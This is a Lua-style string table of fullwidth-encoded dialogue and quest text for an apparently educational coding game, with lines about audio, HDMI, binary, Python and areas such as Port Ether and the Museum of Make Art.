["discoSlo"] = "\239\188\183\239\189\136\239\189\133\239\189\142 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147 \239\189\135\239\189\133\239\189\142\239\189\133\239\189\146\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\149\239\189\132\239\189\137\239\189\143 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\147\239\189\131\239\189\146\239\189\129\239\189\148\239\189\131\239\189\136 \239\189\148\239\189\136\239\189\133\239\189\153 \239\189\141\239\189\143\239\189\147\239\189\148\239\189\140\239\189\153 \239\189\149\239\189\147\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\130\239\189\137\239\189\142\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\143\239\189\134 \239\189\134\239\189\143\239\189\149\239\189\146 \239\189\132\239\189\137\239\189\134\239\189\134\239\189\133\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147.",
["portether03houseCurious"] = "\239\188\180\239\189\136\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\147\239\189\129\239\189\137\239\189\132 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\188\169 \239\189\144\239\189\146\239\189\129\239\189\131\239\189\148\239\189\137\239\189\131\239\189\133 \239\189\129\239\189\148 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\134\239\189\149\239\189\140 \239\188\169'\239\189\140\239\189\140 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\133.",
["cVoltageTitle"] = "\239\188\182\239\189\143\239\189\140\239\189\148\239\189\129\239\189\135\239\189\133",
["audioQuest"] = "\239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\129 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148? \239\188\183\239\189\133\239\189\140\239\189\140, \239\189\143\239\189\142\239\189\133 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\132\239\189\133\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132 \239\189\143\239\189\149\239\189\146 \239\189\147\239\189\143\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\140\239\189\140\239\189\133\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142! \239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\149\239\189\147 \239\189\129 \239\189\147\239\189\143\239\189\142\239\189\135?",
["llRunnerGirl"] = "\239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\189\137\239\189\147 \239\189\131\239\189\143\239\189\143\239\189\140. \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\149\239\189\147\239\189\133 \239\189\137\239\189\148 \239\189\148\239\189\143 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\135\239\189\146\239\189\133\239\189\129\239\189\148 \239\189\135\239\189\129\239\189\141\239\189\133\239\189\147!",
["momaArea"] = "\239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148",
["house03PotNote"] = "\239\188\175\239\189\136! \239\188\180\239\189\136\239\189\133\239\189\146\239\189\133'\239\189\147 \239\189\129 \239\189\142\239\189\143\239\189\148\239\189\133 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\143\239\189\148. \239\188\169\239\189\148 \239\189\146\239\189\133\239\189\129\239\189\132\239\189\147: '\239\188\178\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\151\239\189\129\239\189\147 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\183\239\189\136\239\189\153 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\129\239\189\140\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\129 \239\189\144\239\189\140\239\189\129\239\189\142\239\189\148, \239\189\136\239\189\149\239\189\136?'",
["mrInfo"] = "\239\188\173\239\189\146. \239\188\169\239\189\142\239\189\134\239\189\143",
["newArea"] = "\239\188\174\239\188\165\239\188\183 \239\188\161\239\188\178\239\188\165\239\188\161:",
["portetherSignLibrary"] = "\239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\172\239\189\137\239\189\130\239\189\146\239\189\129\239\189\146\239\189\153",
["cResolution"] = "\239\188\180\239\189\136\239\189\133 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146 \239\189\143\239\189\134 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\136\239\189\143\239\189\146\239\189\137\239\189\154\239\189\143\239\189\142\239\189\148\239\189\129\239\189\140 \239\189\129\239\189\142\239\189\132 \239\189\150\239\189\133\239\189\146\239\189\148\239\189\137\239\189\131\239\189\129\239\189\140 \239\189\129\239\189\152\239\189\137\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\129\239\189\142 \239\189\130\239\189\133 \239\189\132\239\189\137\239\189\147\239\189\144\239\189\140\239\189\129\239\189\153\239\189\133\239\189\132 \239\189\143\239\189\142 \239\189\129 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142.",
["llNerd2"] = "\239\188\169 \239\189\136\239\189\133\239\189\129\239\189\146 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\151\239\189\137\239\189\142\239\189\147 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133 \239\189\141\239\189\129\239\189\153 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\151\239\189\136\239\189\129\239\189\148 \239\188\169 \239\189\142\239\189\133\239\189\133\239\189\132. \239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\137\239\189\148 \239\189\129\239\189\142\239\189\132 \239\189\140\239\189\133\239\189\148 \239\189\141\239\189\133 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142?",
["minesExplorer"] = "\239\188\161\239\189\136\239\189\133\239\189\129\239\189\132, \239\189\133\239\189\142\239\189\148\239\189\133\239\189\146 \239\189\129 \239\189\142\239\189\133\239\189\151 \239\189\132\239\189\137\239\189\141\239\189\133\239\189\142\239\189\147\239\189\137\239\189\143\239\189\142 - \239\189\129 \239\189\144\239\189\140\239\189\129\239\189\131\239\189\133 \239\189\143\239\189\134 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\147",
["discoRunner"] = "\239\188\169 \239\189\131\239\189\129\239\189\142 \239\189\134\239\189\133\239\189\133\239\189\140 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146 \239\189\150\239\189\137\239\189\130\239\189\146\239\189\129\239\189\148\239\189\137\239\189\142\239\189\135. \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\139\239\189\142\239\189\143\239\189\151?",
["newsReporter"] = "\239\188\168\239\188\164 \239\188\174\239\189\133\239\189\151\239\189\147 \239\188\178\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\133\239\189\146",
["portetherTourist"] = "\239\188\173\239\189\153 \239\189\134\239\189\129\239\189\150\239\189\143\239\189\146\239\189\137\239\189\148\239\189\133 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147! \239\188\161\239\189\140\239\189\140 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\141\239\189\137\239\189\152\239\189\133\239\189\132 \239\189\148\239\189\143\239\189\135\239\189\133\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\146\239\189\143\239\189\149\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\129 \239\189\147\239\189\137\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146. \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\188\173\239\189\143\239\189\142\239\189\143.",
["LogicLakeNerdQuestComplete"] = "\239\188\164\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\148\239\189\133\239\189\144-\239\189\130\239\189\153-\239\189\147\239\189\148\239\189\133\239\189\144 \239\189\137\239\189\142\239\189\147\239\189\148\239\189\146\239\189\149\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\189\129\239\189\140\239\189\135\239\189\143\239\189\146\239\189\137\239\189\148\239\189\136\239\189\141\239\189\147 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147.",
["quests"] = "\239\188\177\239\189\149\239\189\133\239\189\147\239\189\148\239\189\147",
["termsitionSign2"] = "\239\188\183\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133!",
["termsitionSign1"] = "01010111 01100101 01101100 01100011 01101111 01101101 01100101 00100001",
["plainsRAMProfessor"] = "\239\188\179\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\189\149\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\129\239\189\132\239\189\132 \239\189\142\239\189\133\239\189\151 \239\189\134\239\189\133\239\189\129\239\189\148\239\189\149\239\189\146\239\189\133\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\143\239\189\144\239\189\133\239\189\142 \239\189\142\239\189\133\239\189\151 \239\189\129\239\189\146\239\189\133\239\189\129\239\189\147, \239\189\140\239\189\137\239\189\139\239\189\133 \239\188\173\239\189\133\239\189\141\239\189\143\239\189\146\239\189\153 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\147. \239\188\162\239\189\133 \239\189\147\239\189\149\239\189\146\239\189\133 \239\189\148\239\189\143 \239\189\131\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\132\239\189\129\239\189\147\239\189\136\239\189\130\239\189\143\239\189\129\239\189\146\239\189\132 \239\189\129\239\189\142\239\189\132 \239\189\149\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133 \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142!",
["hdmiInterview1b"] = "\239\188\163\239\189\136\239\189\129\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148",
["hdmiInterview1a"] = "\239\188\165\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146",
["cHDMI"] = "\239\188\161 \239\189\147\239\189\148\239\189\129\239\189\142\239\189\132\239\189\129\239\189\146\239\189\132 \239\189\134\239\189\143\239\189\146 \239\189\131\239\189\143\239\189\142\239\189\142\239\189\133\239\189\131\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\136\239\189\137\239\189\135\239\189\136-\239\189\132\239\189\133\239\189\134\239\189\137\239\189\142\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\150\239\189\137\239\189\132\239\189\133\239\189\143 \239\189\132\239\189\133\239\189\150\239\189\137\239\189\131\239\189\133\239\189\147. \239\189\133\239\189\135: \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\141\239\189\143\239\189\142\239\189\137\239\189\148\239\189\143\239\189\146, \239\189\148\239\189\133\239\189\140\239\189\133\239\189\150\239\189\137\239\189\147\239\189\137\239\189\143\239\189\142.",
["minesSleepingGirl"] = "\239\188\186\239\189\154\239\189\154\239\189\154\239\189\154\239\189\154 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\148\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\129 \239\189\145\239\189\149\239\189\137\239\189\131\239\189\139 \239\189\130\239\189\146\239\189\133\239\189\129\239\189\139... \239\188\169'\239\189\150\239\189\133 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\140\239\189\140 \239\189\132\239\189\129\239\189\153. \239\188\186\239\189\154\239\189\154\239\189\154\239\189\154\239\189\154...",
["beachArea"] = "\239\188\179\239\188\164 \239\188\162\239\189\133\239\189\129\239\189\131\239\189\136",
["newQuest"] = "\239\188\174\239\188\165\239\188\183 \239\188\177\239\188\181\239\188\165\239\188\179\239\188\180:",
["mrFlappy2"] = "\239\188\163\239\189\143\239\189\141\239\189\133 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\129\239\189\142\239\189\153 \239\189\148\239\189\137\239\189\141\239\189\133.",
["mrFlappy1"] = "\239\188\167\239\189\146\239\189\133\239\189\129\239\189\148 \239\189\135\239\189\129\239\189\141\239\189\133\239\189\147 \239\189\129\239\189\146\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\133\239\189\132 \239\189\143\239\189\142 \239\189\147\239\189\137\239\189\141\239\189\144\239\189\140\239\189\133 \239\189\140\239\189\143\239\189\135\239\189\137\239\189\131. \239\188\166\239\189\140\239\189\129\239\189\144 \239\189\149\239\189\144, \239\189\143\239\189\146 \239\189\133\239\189\140\239\189\147\239\189\133 \239\189\134\239\189\129\239\189\140\239\189\140 \239\189\132\239\189\143\239\189\151\239\189\142. \239\188\185\239\189\143\239\189\149\239\189\146 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\147\239\189\131\239\189\143\239\189\146\239\189\133 \239\189\137\239\189\147 $1. \239\188\172\239\189\133\239\189\148'\239\189\147 \239\189\147\239\189\133\239\189\133 \239\189\136\239\189\143\239\189\151 \239\189\134\239\189\129\239\189\146 \239\189\153\239\189\143\239\189\149 \239\189\134\239\189\140\239\189\153!",
["portetherDemonBoy"] = "\239\188\180\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\151\239\189\129\239\189\147 \239\189\129 \239\189\148\239\189\137\239\189\141\239\189\133 \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\149\239\189\147\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\136\239\189\143\239\189\140\239\189\132 \239\189\144\239\189\129\239\189\146\239\189\148\239\189\137\239\189\133\239\189\147 \239\189\149\239\189\144 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\174\239\189\143\239\189\148 \239\189\129\239\189\142\239\189\153\239\189\141\239\189\143\239\189\146\239\189\133...",
["jungleAsterixQuestTitle"] = "\239\188\181\239\189\142\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\151\239\189\137\239\189\148\239\189\136 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133",
["cSpeakerTitle"] = "\239\188\179\239\189\144\239\189\133\239\189\129\239\189\139\239\189\133\239\189\146",
["cPython"] = "\239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\189\137\239\189\147 \239\189\129 \239\189\136\239\189\137\239\189\135\239\189\136-\239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133. \239\188\169\239\189\148 \239\189\137\239\189\147 \239\189\133\239\189\129\239\189\147\239\189\153 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\132\239\189\149\239\189\133 \239\189\148\239\189\143 \239\189\137\239\189\148\239\189\147 \239\189\147\239\189\137\239\189\141\239\189\144\239\189\140\239\189\133 \239\189\147\239\189\153\239\189\142\239\189\148\239\189\129\239\189\152 \239\189\129\239\189\142\239\189\132 \239\189\150\239\189\133\239\189\146\239\189\153 \239\189\146\239\189\133\239\189\129\239\189\132\239\189\129\239\189\130\239\189\140\239\189\133 \239\189\132\239\189\149\239\189\133 \239\189\148\239\189\143 \239\189\137\239\189\148\239\189\147 \239\189\151\239\189\136\239\189\137\239\189\148\239\189\133 \239\189\147\239\189\144\239\189\129\239\189\131\239\189\133.",
["gregory3"] = "\239\188\183\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 $1! \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\129 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142?",
["discoSloSquare"] = "\239\188\180\239\189\136\239\189\133 \239\189\147\239\189\145\239\189\149\239\189\129\239\189\146\239\189\133 \239\189\151\239\189\129\239\189\150\239\189\133 \239\189\131\239\189\129\239\189\142 \239\189\130\239\189\133 \239\189\148\239\189\143\239\189\143 \239\189\136\239\189\129\239\189\146\239\189\147\239\189\136 \239\189\137\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\140\239\189\137\239\189\147\239\189\148\239\189\133\239\189\142 \239\189\148\239\189\143 \239\189\137\239\189\148 \239\189\149\239\189\142\239\189\134\239\189\137\239\189\140\239\189\148\239\189\133\239\189\146\239\189\133\239\189\132, \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\137\239\189\139\239\189\133 \239\189\129\239\189\142 \239\189\129\239\189\142\239\189\135\239\189\146\239\189\153 \239\189\140\239\189\143\239\189\149\239\189\132 \239\189\130\239\189\133\239\189\133\239\189\144.",
["HDmaster"] = "1080\239\189\144. \239\188\161 \239\189\151\239\189\133\239\189\137\239\189\146\239\189\132 \239\189\142\239\189\129\239\189\141\239\189\133? \239\188\162\239\189\149\239\189\148 \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146 \239\189\143\239\189\134 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142 \239\189\137\239\189\141\239\189\129\239\189\135\239\189\133 \239\189\137\239\189\147. \239\188\173\239\189\143\239\189\146\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\149\239\189\144 \239\189\142\239\189\133\239\189\152\239\189\148, \239\189\143\239\189\142 \239\188\168\239\188\164 \239\189\142\239\189\133\239\189\151\239\189\147.",
["powerLED"] = "\239\188\185\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133 \239\189\129 \239\189\147\239\189\136\239\189\137\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\130\239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\146\239\189\133\239\189\132 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146\239\189\147 \239\188\176\239\188\183\239\188\178 \239\189\149\239\189\142\239\189\132\239\189\133\239\189\146\239\189\142\239\189\133\239\189\129\239\189\148\239\189\136.",
["portetherRunningGirl"] = "\239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\189\146\239\189\149\239\189\142\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\143\239\189\143\239\189\144\239\189\147.",
["mrPong"] = "\239\188\161\239\189\140\239\189\140\239\189\129\239\189\142",
["makeMusic"] = "\239\188\172\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136 \239\188\179\239\189\143\239\189\142\239\189\137\239\189\131 \239\188\176\239\189\137",
["loading"] = "\239\188\172\239\189\143\239\189\129\239\189\132\239\189\137\239\189\142\239\189\135",
["cBinary"] = "\239\188\161 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\147\239\189\153\239\189\147\239\189\148\239\189\133\239\189\141 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\143\239\189\142\239\189\140\239\189\153 \239\189\148\239\189\151\239\189\143 \239\189\144\239\189\143\239\189\147\239\189\147\239\189\137\239\189\130\239\189\140\239\189\133 \239\189\150\239\189\129\239\189\140\239\189\149\239\189\133\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\133\239\189\129\239\189\131\239\189\136 \239\189\132\239\189\137\239\189\135\239\189\137\239\189\148: 0 \239\189\129\239\189\142\239\189\132 1.",
["chiefPixelHackerHelp7"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["chiefPixelHackerHelp6"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\133\239\189\132\239\189\137\239\189\149\239\189\141 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["chiefPixelHackerHelp5"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["chiefPixelHackerHelp4"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["chiefPixelHackerHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["chiefPixelHackerHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\177\239\189\149\239\189\137\239\189\154.",
["chiefPixelHackerHelp1"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["portetherQuest1a"] = "\239\188\185\239\189\143\239\189\149 \239\189\147\239\189\133\239\189\133 \239\189\144\239\189\129\239\189\146\239\189\148 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\136\239\189\143\239\189\149\239\189\147\239\189\133 \239\189\136\239\189\129\239\189\147 \239\189\132\239\189\137\239\189\147\239\189\129\239\189\144\239\189\144\239\189\133\239\189\129\239\189\146\239\189\133\239\189\132. \239\188\161\239\189\140\239\189\141\239\189\143\239\189\147\239\189\148 \239\189\129\239\189\147 \239\189\137\239\189\134 \239\189\137\239\189\148'\239\189\147 \239\189\130\239\189\133\239\189\133\239\189\142 \239\189\141\239\189\143\239\189\150\239\189\133\239\189\132. \239\188\161\239\189\142\239\189\132 \239\189\129 \239\189\142\239\189\143\239\189\148\239\189\133 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\148\239\189\136\239\189\133 \239\189\140\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146\239\189\147 \239\188\173\239\188\182 ~/.",
["portetherCafeGirl2"] = "\239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\189\137\239\189\147 \239\189\129 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133. \239\188\169\239\189\148 \239\189\137\239\189\147 \239\189\150\239\189\133\239\189\146\239\189\153 \239\189\144\239\189\143\239\189\144\239\189\149\239\189\140\239\189\129\239\189\146! \239\188\180\239\189\146\239\189\153 \239\189\143\239\189\149\239\189\148 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133 \239\189\148\239\189\143 \239\189\147\239\189\133\239\189\133 \239\189\147\239\189\143\239\189\141\239\189\133 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\189\137\239\189\142 \239\189\129\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142.",
["portetherCafeGirl3"] = "\239\188\175\239\189\136 \239\189\143\239\189\139, \239\189\148\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\129 \239\189\147\239\189\136\239\189\129\239\189\141\239\189\133.",
["audioJack3"] = "\239\188\185\239\189\143\239\189\149\239\189\146 \239\189\133\239\189\129\239\189\146\239\189\147 \239\189\136\239\189\133\239\189\129\239\189\146 \239\189\130\239\189\153 \239\189\132\239\189\133\239\189\148\239\189\133\239\189\131\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\150\239\189\137\239\189\130\239\189\146\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\151\239\189\129\239\189\150\239\189\133\239\189\147.",
["audioJack2"] = "\239\188\180\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\137\239\189\147 \239\189\143\239\189\140\239\189\132 \239\189\147\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140. \239\188\169 \239\189\147\239\189\129\239\189\153 \239\189\151\239\189\133 \239\189\146\239\189\133\239\189\142\239\189\129\239\189\141\239\189\133 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\148\239\189\143\239\189\151\239\189\142 \239\189\148\239\189\143 \239\188\176\239\189\143\239\189\146\239\189\148 \239\189\143\239\189\134 \239\188\179\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\129\239\189\142\239\189\132 \239\189\144\239\189\129\239\189\146\239\189\148\239\189\153 \239\189\129\239\189\140\239\189\140 \239\189\132\239\189\129\239\189\153 \239\189\140\239\189\143\239\189\142\239\189\135!",
